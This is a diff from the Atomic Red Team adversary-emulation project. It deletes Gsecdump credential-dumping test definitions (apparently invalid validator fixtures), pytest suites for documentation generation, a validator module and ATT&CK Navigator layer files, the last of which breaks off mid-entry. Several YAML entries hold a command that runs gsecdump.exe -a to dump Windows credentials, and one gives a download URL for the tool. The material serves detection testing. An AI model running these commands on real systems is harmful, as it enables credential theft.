Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
@@ -1,13 +0,0 @@
attack_technique: W1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
executor:
command: |
echo "ART"
name: command_prompt
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
@@ -1,27 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: string
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: url
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
View File
-77
View File
@@ -1,77 +0,0 @@
import json
from atomic_red_team.attack_api import Attack
def test_techniques_by_tactic_filters_platform_revoked_and_deprecated(tmp_path):
attack_file = tmp_path / "enterprise-attack.json"
attack_file.write_text(
json.dumps(
{
"type": "bundle",
"id": "bundle--11111111-1111-4111-8111-111111111111",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11111111-1111-4111-8111-111111111111",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Allowed Technique",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1001"}
],
"x_mitre_platforms": ["Windows"],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
}
],
},
{
"type": "attack-pattern",
"id": "attack-pattern--22222222-2222-4222-8222-222222222222",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Wrong Platform",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1002"}
],
"x_mitre_platforms": ["Linux"],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
}
],
},
{
"type": "attack-pattern",
"id": "attack-pattern--33333333-3333-4333-8333-333333333333",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Revoked Technique",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1003"}
],
"x_mitre_platforms": ["Windows"],
"revoked": True,
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
}
],
},
],
}
)
)
attack = Attack(attack_file)
assert attack.technique_info("t1001")["name"] == "Allowed Technique"
assert attack.techniques_by_tactic("windows")["execution"] == [
attack.technique_info("T1001")
]
-473
View File
@@ -1,473 +0,0 @@
import json
import yaml
from mitreattack import navlayers
from atomic_red_team.docs import AtomicRedTeam, AtomicRedTeamDocs
def test_generate_technique_docs_writes_markdown(tmp_path):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
atomic_yaml_path = technique_dir / "T1001.yaml"
atomic_yaml_path.write_text(
yaml.safe_dump(
{
"attack_technique": "T1001",
"display_name": "Data Obfuscation",
"atomic_tests": [
{
"name": "Run command",
"description": "Runs a command.",
"supported_platforms": ["windows"],
"auto_generated_guid": "11111111-1111-4111-8111-111111111111",
"input_arguments": {
"path": {
"description": "File path",
"type": "path",
"default": "C:\\Temp\\file.txt",
}
},
"executor": {
"name": "command_prompt",
"command": "type #{path}",
"cleanup_command": "del #{path}",
},
}
],
}
)
)
attack_file = tmp_path / "enterprise-attack.json"
attack_file.write_text(
json.dumps(
{
"type": "bundle",
"id": "bundle--11111111-1111-4111-8111-111111111111",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11111111-1111-4111-8111-111111111111",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Data Obfuscation",
"description": "Technique description.",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1001"}
],
"x_mitre_platforms": ["Windows"],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
}
],
}
],
}
)
)
output_path = technique_dir / "T1001.md"
atomic_red_team = AtomicRedTeam(atomics_dir=atomics_dir)
docs = AtomicRedTeamDocs(attack_file=attack_file, atomic_red_team=atomic_red_team)
docs.generate_technique_docs(
atomic_red_team.atomic_tests[0],
output_path,
)
output = output_path.read_text()
assert "# T1001 - Data Obfuscation" in output
assert "[Atomic Test #1: Run command](#atomic-test-1-run-command)" in output
assert "| path | File path | path | C:&#92;Temp&#92;file.txt|" in output
assert "```cmd\ntype #{path}\n```" in output
assert "```cmd\ndel #{path}\n```" in output
def test_generate_technique_docs_separates_markdown_blocks(tmp_path):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
atomic_yaml_path = technique_dir / "T1001.yaml"
atomic_yaml_path.write_text(
yaml.safe_dump(
{
"attack_technique": "T1001",
"display_name": "Data Obfuscation",
"atomic_tests": [
{
"name": "First command",
"description": "Runs a command.",
"supported_platforms": ["windows"],
"auto_generated_guid": "11111111-1111-4111-8111-111111111111",
"input_arguments": {
"path": {
"description": "File path",
"type": "path",
"default": "C:\\Temp",
}
},
"executor": {
"name": "command_prompt",
"command": "type #{path}",
"cleanup_command": "del #{path}",
},
"dependencies": [
{
"description": "Target must exist",
"prereq_command": "if exist #{path} (exit /b 0)",
"get_prereq_command": "mkdir #{path}",
}
],
},
{
"name": "Second command",
"description": "Runs another command.",
"supported_platforms": ["windows"],
"auto_generated_guid": "22222222-2222-4222-8222-222222222222",
"executor": {"name": "command_prompt", "command": "dir"},
},
],
}
)
)
attack_file = tmp_path / "enterprise-attack.json"
attack_file.write_text(
json.dumps(
{
"type": "bundle",
"id": "bundle--11111111-1111-4111-8111-111111111111",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11111111-1111-4111-8111-111111111111",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Data Obfuscation",
"description": "Technique description.",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1001"}
],
"x_mitre_platforms": ["Windows"],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
}
],
}
],
}
)
)
output_path = technique_dir / "T1001.md"
atomic_red_team = AtomicRedTeam(atomics_dir=atomics_dir)
docs = AtomicRedTeamDocs(attack_file=attack_file, atomic_red_team=atomic_red_team)
docs.generate_technique_docs(atomic_red_team.atomic_tests[0], output_path)
output = output_path.read_text()
assert (
output
== """# T1001 - Data Obfuscation
## Description from ATT&CK
> Technique description.
[Source](https://attack.mitre.org/techniques/T1001)
## Atomic Tests
- [Atomic Test #1: First command](#atomic-test-1-first-command)
- [Atomic Test #2: Second command](#atomic-test-2-second-command)
### Atomic Test #1: First command
Runs a command.
**Supported Platforms:** Windows
**auto_generated_guid:** `11111111-1111-4111-8111-111111111111`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path | File path | path | C:&#92;Temp|
#### Attack Commands: Run with `command_prompt`!
```cmd
type #{path}
```
#### Cleanup Commands
```cmd
del #{path}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must exist
###### Check Prereq Commands
```cmd
if exist #{path} (exit /b 0)
```
###### Get Prereq Commands
```cmd
mkdir #{path}
```
### Atomic Test #2: Second command
Runs another command.
**Supported Platforms:** Windows
**auto_generated_guid:** `22222222-2222-4222-8222-222222222222`
#### Attack Commands: Run with `command_prompt`!
```cmd
dir
```
"""
)
def test_github_link_prompts_for_contribution_when_platform_missing(tmp_path):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
(technique_dir / "T1001.yaml").write_text(
yaml.safe_dump(
{
"attack_technique": "T1001",
"display_name": "Data Obfuscation",
"atomic_tests": [
{
"name": "Run command",
"description": "Runs a command.",
"supported_platforms": ["windows"],
"executor": {"name": "command_prompt", "command": "dir"},
}
],
}
)
)
atomic_red_team = AtomicRedTeam(atomics_dir=atomics_dir)
technique = {
"name": "Data Obfuscation",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1001"}
],
}
link = atomic_red_team.github_link_to_technique(
technique,
include_identifier=True,
only_platform="linux",
)
assert link == (
"T1001 Data Obfuscation "
"[CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
)
def test_generate_navigator_layers_writes_mitreattack_layer(tmp_path):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
(technique_dir / "T1001.yaml").write_text(
yaml.safe_dump(
{
"attack_technique": "T1001",
"display_name": "Data Obfuscation",
"atomic_tests": [
{
"name": "Windows command",
"description": "Runs a command.",
"supported_platforms": ["windows"],
"executor": {"name": "command_prompt", "command": "dir"},
},
{
"name": "Linux command",
"description": "Runs a command.",
"supported_platforms": ["linux"],
"executor": {"name": "sh", "command": "ls"},
},
],
}
)
)
output_dir = tmp_path / "layers"
output_dir.mkdir()
docs = AtomicRedTeamDocs(
base_dir=tmp_path,
attack_file=tmp_path / "enterprise-attack.json",
atomic_red_team=AtomicRedTeam(atomics_dir=atomics_dir),
)
docs.generate_navigator_layers(output_dir)
layer = navlayers.Layer()
layer.from_file(str(output_dir / "art-navigator-layer-windows.json"))
technique = layer.layer.techniques[0]
assert layer.layer.name == "Atomic Red Team (Windows)"
assert layer.layer.versions.attack == "19"
assert layer.layer.filters.platforms == ["Windows"]
assert technique.techniqueID == "T1001"
assert technique.score == 1
assert technique.comment == "\n- Windows command\n"
def test_generate_all_the_docs_prints_generated_file_paths(
tmp_path, capsys, monkeypatch
):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
atomic_yaml_path = technique_dir / "T1001.yaml"
atomic_yaml_path.write_text(
yaml.safe_dump(
{
"attack_technique": "T1001",
"display_name": "Data Obfuscation",
"atomic_tests": [
{
"name": "Run command",
"description": "Runs a command.",
"supported_platforms": ["windows"],
"executor": {"name": "command_prompt", "command": "dir"},
}
],
}
)
)
attack_file = tmp_path / "enterprise-attack.json"
attack_file.write_text(
json.dumps(
{
"type": "bundle",
"id": "bundle--11111111-1111-4111-8111-111111111111",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11111111-1111-4111-8111-111111111111",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Data Obfuscation",
"description": "Technique description.",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1001"}
],
"x_mitre_platforms": ["Windows"],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
}
],
}
],
}
)
)
indexes_dir = atomics_dir / "Indexes"
for path in [
indexes_dir / "Matrices",
indexes_dir / "Indexes-Markdown",
indexes_dir / "Indexes-CSV",
indexes_dir / "Attack-Navigator-Layers",
]:
path.mkdir(parents=True)
docs = AtomicRedTeamDocs(
base_dir=tmp_path,
attack_file=attack_file,
atomic_red_team=AtomicRedTeam(atomics_dir=atomics_dir),
)
monkeypatch.setattr(docs, "generate_indexes", lambda: None)
docs.generate_all_the_docs()
output = capsys.readouterr().out
expected_markdown_path = technique_dir / "T1001.md"
assert f"Generating docs for {atomic_yaml_path}" in output
assert f"=> {expected_markdown_path} => OK" in output
assert f"Generated docs for 1 techniques, 0 failures" in output
def test_generate_yaml_index_serializes_mitreattack_stix_dates(tmp_path):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
(technique_dir / "T1001.yaml").write_text(
yaml.safe_dump(
{
"attack_technique": "T1001",
"display_name": "Data Obfuscation",
"atomic_tests": [
{
"name": "Run command",
"description": "Runs a command.",
"supported_platforms": ["windows"],
"executor": {"name": "command_prompt", "command": "dir"},
}
],
}
)
)
attack_file = tmp_path / "enterprise-attack.json"
attack_file.write_text(
json.dumps(
{
"type": "bundle",
"id": "bundle--11111111-1111-4111-8111-111111111111",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--11111111-1111-4111-8111-111111111111",
"created": "2024-01-01T00:00:00.000Z",
"modified": "2024-01-01T00:00:00.000Z",
"name": "Data Obfuscation",
"description": "Technique description.",
"external_references": [
{"source_name": "mitre-attack", "external_id": "T1001"}
],
"x_mitre_platforms": ["Windows"],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
}
],
}
],
}
)
)
output_path = tmp_path / "index.yaml"
docs = AtomicRedTeamDocs(
base_dir=tmp_path,
attack_file=attack_file,
atomic_red_team=AtomicRedTeam(atomics_dir=atomics_dir),
)
docs.generate_yaml_index(output_path)
output = yaml.safe_load(output_path.read_text())
assert output["command-and-control"]["T1001"]["technique"]["created"] == (
"2024-01-01T00:00:00.000Z"
)
-125
View File
@@ -1,125 +0,0 @@
from hypothesis import given, strategies as st, settings, HealthCheck
from hypothesis.provisional import urls
from pydantic import AnyUrl
from pydantic.networks import IPvAnyAddress
from atomic_red_team.models import (
Technique,
Atomic,
StringArg,
IntArg,
FloatArg,
UrlArg,
ManualExecutor,
Platform,
CommandExecutor,
ExecutorType,
)
executor_strategy = st.sampled_from(["powershell", "bash", "sh", "command_prompt"])
st.register_type_strategy(IPvAnyAddress, st.ip_addresses())
st.register_type_strategy(AnyUrl, urls())
alphanumeric_underscore_strategy = st.text(
alphabet=st.sampled_from(
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
),
min_size=4,
)
input_args_types = [
st.builds(
StringArg,
description=st.text(),
default=st.text(),
type=st.sampled_from(["string", "path", "String", "Path"]),
),
st.builds(
IntArg,
description=st.text(),
default=st.integers(),
type=st.sampled_from(["integer", "Integer"]),
),
st.builds(
FloatArg,
description=st.text(),
default=st.floats(),
type=st.sampled_from(["float", "Float"]),
),
st.builds(
UrlArg,
description=st.text(),
default=st.one_of(urls(), st.ip_addresses()),
type=st.sampled_from(["url", "Url"]),
),
]
platforms_strategy = st.lists(st.sampled_from(list(Platform.__args__)), min_size=1)
input_arguments_strategy = st.dictionaries(
keys=alphanumeric_underscore_strategy, values=st.one_of(*input_args_types)
)
atomics_strategy = dict(
input_arguments=input_arguments_strategy,
name=alphanumeric_underscore_strategy,
description=st.text(min_size=5),
supported_platforms=platforms_strategy,
)
def atomic_manual_executor_builder():
def build_atomic(input_arguments, **kwargs):
formatted_args = " ".join(
[f"echo #{key}=#{{{key}}}" for key in input_arguments.keys()]
)
return Atomic(
**kwargs,
executor=ManualExecutor(
name="manual", steps=f"{formatted_args} Custom steps here..."
),
input_arguments=input_arguments,
)
return st.builds(build_atomic, **atomics_strategy)
def atomic_command_executor_builder():
def build_atomic(input_arguments, executor_name, **kwargs):
formatted_args = " ".join(
[f"echo #{key}=#{{{key}}}" for key in input_arguments.keys()]
)
return Atomic(
executor=CommandExecutor(
name=executor_name,
command=f"{formatted_args} Custom steps here...",
elevation_required="sudo" in formatted_args,
),
input_arguments=input_arguments,
**kwargs,
)
return st.builds(build_atomic, executor_name=executor_strategy, **atomics_strategy)
@given(
st.builds(
Technique,
attack_technique=st.integers(min_value=1000, max_value=9999).map(
lambda x: f"T{x}"
),
atomic_tests=st.lists(
st.one_of(
atomic_manual_executor_builder(), atomic_command_executor_builder()
),
min_size=1,
),
)
)
@settings(max_examples=500, suppress_health_check=[HealthCheck.too_slow])
def test_property(instance):
assert isinstance(instance, Technique)
assert len(instance.attack_technique) > 4
assert len(instance.display_name) >= 5
for test in instance.atomic_tests:
assert isinstance(test, Atomic)
assert test.executor.name in ExecutorType.__args__
-31
View File
@@ -1,31 +0,0 @@
from atomic_red_team.new_atomic import create_or_append_atomic
def test_create_or_append_atomic_creates_new_technique_file(tmp_path):
atomics_dir = tmp_path / "atomics"
output_path = create_or_append_atomic("t1001", atomics_dir=atomics_dir)
assert output_path == atomics_dir / "T1001" / "T1001.yaml"
assert "attack_technique: T1001" in output_path.read_text()
assert "atomic_tests:" in output_path.read_text()
def test_create_or_append_atomic_appends_atomic_test_to_existing_file(tmp_path):
atomics_dir = tmp_path / "atomics"
technique_dir = atomics_dir / "T1001"
technique_dir.mkdir(parents=True)
output_path = technique_dir / "T1001.yaml"
output_path.write_text(
"attack_technique: T1001\n"
"display_name: Existing Technique\n"
"atomic_tests:\n"
"- name: Existing test\n"
)
create_or_append_atomic("T1001", atomics_dir=atomics_dir)
output = output_path.read_text()
assert "- name: Existing test" in output
assert output.count("- name: TODO") == 1
assert output.count("atomic_tests:") == 1
-20
View File
@@ -1,20 +0,0 @@
import os
from os.path import dirname, realpath
from pathlib import Path
import pytest
from pydantic import ValidationError
from atomic_red_team.validator import Validator
test_data_path = f"{dirname(dirname(realpath(__file__)))}/test_data"
@pytest.mark.parametrize("test_input", list(os.scandir(test_data_path)))
def test_all_invalid_scenarios(test_input):
validator = Validator()
with pytest.raises(ValidationError) as exc_info:
validator.validate(test_input)
error_types = [e["type"] for e in exc_info.value.errors()]
assert Path(test_input).stem in error_types
-116
View File
@@ -1,116 +0,0 @@
import collections
import fnmatch
from os import DirEntry
from pydantic import ValidationError
from pydantic_core import InitErrorDetails, PydanticCustomError
from ruamel.yaml import YAML
from atomic_red_team.common import atomics_path, used_guids_file
from atomic_red_team.models import Technique
yaml = YAML(typ="safe")
def format_validation_error(error: ValidationError):
if len(error.errors()) == 1:
err = error.errors()[0]
message = ""
if err["type"] == "elevation_required_but_not_provided":
return {err["msg"]: list(err.get("loc")) + err.get("ctx").get("loc")}
if err["input"] and err["type"] != "unused_input_argument":
message += f"{err['input']} - "
return {message + err["msg"]: err.get("loc")}
inputs = collections.defaultdict(set)
for e in error.errors():
if e["type"] == "elevation_required_but_not_provided":
return {e["msg"]: e.get("loc") + e.get("ctx").get("loc")}
# If it's a union type, then it generates multiple errors for the same input arguments.
# Here we collect only the common paths. For example,
# [( input_arguments, url_parsing),(input_arguments, string_mismatch)] => (input_arguments)
if len(inputs[e["input"]]) == 0:
inputs[e["input"]] = e.get("loc", tuple())
else:
inputs[e["input"]] = tuple(
[x for x in inputs[e["input"]] if x in e.get("loc", tuple())]
)
return dict(inputs)
class Validator:
def __init__(self):
with open(used_guids_file, "r") as f:
self.used_guids = [x.strip() for x in f.readlines()]
self.guids = []
def validate(self, obj: DirEntry):
if obj.is_file():
if fnmatch.fnmatch(obj.name, "*.y*ml"):
self.validate_file(obj)
if obj.is_dir():
self.validate_directory(obj)
def validate_file(self, file: DirEntry):
"""Performs file validation"""
self.validate_yaml_extension(file)
self.validate_atomic(file)
def validate_atomic(self, file: DirEntry):
"""Validates whether the defined input args are used."""
with open(file.path, "r") as f:
atomic = yaml.load(f)
technique = Technique(**atomic)
for index, t in enumerate(technique.atomic_tests):
if t.auto_generated_guid:
if t.auto_generated_guid not in self.guids:
self.guids.append(t.auto_generated_guid)
else:
raise ValidationError.from_exception_data(
"ValueError",
[
InitErrorDetails(
type=PydanticCustomError(
"reused_guid",
f"GUID {t.auto_generated_guid} reused for test {t.name}. GUIDs are auto generated. You can remove atomic_tests[{index}].auto_generated_guid",
),
loc=("atomic_tests", index, "auto_generated_guid"),
input=t.auto_generated_guid,
)
],
)
def validate_yaml_extension(self, file: DirEntry):
"""Validates the yaml extension"""
if fnmatch.fnmatch(file.path, "*.yml"):
raise ValidationError.from_exception_data(
"ValueError",
[
InitErrorDetails(
type=PydanticCustomError(
"invalid_filename",
"Rename file from .yml to .yaml",
),
loc=["filename"],
)
],
)
def validate_directory(self, directory: DirEntry):
"""Performs directory validation"""
self.validate_directory_path(directory)
def validate_directory_path(self, directory: DirEntry):
"""Validated whether the directory is allowed directory name (`src` or `bin`)"""
if directory.name not in ["src", "bin"]:
raise ValidationError.from_exception_data(
"ValueError",
[
InitErrorDetails(
type=PydanticCustomError(
"invalid_directory",
"Invalid path. `src` and `bin` are the only two directories supported.",
),
loc=["directory"],
)
],
)
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Containers)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege 
